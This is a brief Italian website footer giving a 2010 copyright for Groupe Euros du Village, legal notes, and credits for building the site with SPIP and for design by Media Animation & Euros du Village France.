© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France